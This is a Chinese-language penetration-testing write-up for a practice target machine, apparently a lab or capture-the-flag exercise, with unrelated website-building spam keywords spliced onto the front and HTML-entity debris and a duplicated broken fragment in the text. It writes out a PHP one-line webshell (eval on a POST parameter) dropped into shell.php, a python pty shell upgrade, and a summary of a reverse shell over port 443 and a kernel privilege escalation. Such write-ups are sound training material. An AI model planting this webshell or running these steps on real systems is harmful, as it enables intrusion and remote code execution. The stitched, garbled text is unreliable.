免费网站建设策划,南通营销型网站,北京信息维护公司,做剧情游戏的网站信息收集部分#xff1a;
1.nmap存活探测#xff1a; 2.nmap端口探测#xff1a; 3.nmap服务探测#xff1a;
这里应该是21和80端口#xff0c;#xff0c;但21需要登陆访问#xff0c;用不了#xff0c;问题不大。 web#xff1a;
页面#xff1a; 发现RCE: 1.we…信息收集部分
1.nmap存活探测 2.nmap端口探测 3.nmap服务探测
这里应该是21和80端口但21需要登陆访问用不了问题不大。 web
页面 发现RCE: 1.web渗透
我们先创建一个新文件写入一个一句话木马 echo ?php echo success;eval($_POST[shell]); ? shell.php
上传成功蚁剑连接。 2.反弹shell 这里尝试好多次都连不上。
看了一些大佬的wp发现该靶机只能用443端口防火墙做了限制。
我们再次反弹shell成功。 交互式shell
python3 -c import pty;pty.spawn(/bin/bash)
提权
我们直接内核提权 这里发现下载有问题靶机下载不了我们直接蚁剑上传 靶机编译执行 查看flag: 哦对了我们看看防火墙设置
果然是防火墙的策略导致其他端口反弹shell失败。
